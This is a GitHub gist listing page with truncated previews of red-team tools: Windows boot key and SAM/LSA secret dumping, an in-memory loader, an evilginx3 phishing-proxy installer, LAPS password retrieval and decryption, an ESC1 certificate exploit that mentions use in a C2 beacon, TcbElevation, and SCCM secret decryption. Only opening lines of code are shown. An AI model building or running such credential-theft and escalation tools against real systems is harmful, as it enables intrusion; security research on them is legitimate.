eversinc33
/ get_dll_from_symbol_server.cpp
Last active
March 2, 2025 06:30
https://x.com/eversinc33/status/1888577040594411956
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <iostream> | |
| #include <sstream> | |
| std::string | |
| GetSymbolServerURL( | |
| const std::string& moduleName | |
| ) | |
| { | |
| /* Extract timestamp and image size from a module |
Dfte
/ DumpBootKey.c
Created
July 4, 2024 13:49
C code to dump and compute the boot key used to decrypt SAM and LSA secrets.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| #define BOOT_KEY_SIZE 16 | |
| #pragma warning(disable: 4996) | |
| void getRegistryClassValue(HKEY rootKey, const char* subKey, char* classValue, DWORD classValueSize) { | |
| HKEY hKey; | |
| LONG result = RegOpenKeyExA(rootKey, subKey, 0, KEY_READ, &hKey); | |
| if (result != ERROR_SUCCESS) { | |
| fprintf(stderr, "Error opening registry key: %ld\n", result); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $source = @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class InMemoryExecutable : IDisposable | |
| { | |
| public class DllException : Exception | |
| { | |
| public DllException() : base() { } | |
| public DllException(string message) : base(message) { } |
dunderhay
/ install_evilginx3.sh
Last active
March 13, 2025 00:57
bash script to install evilginx3 on a ubuntu linux host
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| set -e | |
| GO_VERSION="1.22.3" | |
| GO_URL="https://go.dev/dl/go${GO_VERSION}.linux-amd64.tar.gz" | |
| EXPECTED_CHECKSUM="8920ea521bad8f6b7bc377b4824982e011c19af27df88a815e3586ea895f1b36" | |
| # Log output of script | |
| exec > >(tee -i /home/ubuntu/install.log) | |
| exec 2>&1 |
xpn
/ AADLAPS_Request.txt
Last active
January 30, 2024 10:34
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GET /beta/deviceLocalCredentials/[DEVICE-ID]?$select=credentials HTTP/1.1 | |
| ocp-client-version: 1.0 | |
| client-request-id: 96cbfa59-dbfc-4a92-b261-7f77bd8f4b9b | |
| ocp-client-name: Get-LapsAADPassword Windows LAPS Cmdlet | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Microsoft Windows 10.0.22621; en-US) PowerShell/5.1.22621.963 Invoke-MgGraphRequest | |
| SdkVersion: graph-powershell/1.26.0, Graph-dotnet-1.25.1 | |
| FeatureFlag: 00000047 | |
| Cache-Control: no-store, no-cache | |
| Authorization: Bearer [AAD-JWT-HERE] | |
| Accept-Encoding: gzip |
xpn
/ LAPSDecrypt.cs
Last active
October 11, 2024 18:16
Quick POC looking at how encryption works for LAPS (v2)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.DirectoryServices.Protocols; | |
| using System.Globalization; | |
| using System.Linq; | |
| using System.Runtime.InteropServices; | |
| using System.Runtime.InteropServices.ComTypes; | |
| using System.Security.Policy; | |
| using System.Security.Principal; | |
| using System.Text; |
b4cktr4ck2
/ esc1.ps1
Created
February 22, 2023 21:50
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Thank you @NotMedic for troubleshooting/validating stuff! | |
| $password = Read-Host -Prompt "Enter Password" | |
| #^^ Feel free to hardcode this for running in a beacon/not retyping it all the time! | |
| $server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. | |
| $CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored? | |
| $CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box. | |
| $CASERVER = "alexlab-dc01-ca" #CA name. | |
| $CA = $CAFQDN + "\" + $CASERVER |
Dump-GUY
/ Program.cs
Last active
June 21, 2024 21:08
Example of DynamicCompiler - dynamically compile C# code -> but it actually spawns csc.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.CodeDom.Compiler; | |
| using Microsoft.CSharp; | |
| using System.Linq; | |
| namespace DynamicCompiler | |
| { | |
| internal class Program | |
| { | |
| public static void DynamicRun(string codes, string clazz, string method, string[] args) |
antonioCoco
/ TcbElevation.cpp
Last active
March 26, 2025 07:53
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // TcbElevation - Authors: @splinter_code and @decoder_it | |
| #define SECURITY_WIN32 | |
| #include <windows.h> | |
| #include <sspi.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "Secur32.lib") | |
| void EnableTcbPrivilege(BOOL enforceCheck); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;) | |
| // Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work. | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| namespace SCCMDecryptPOC | |
| { | |
| internal class Program |
NewerOlder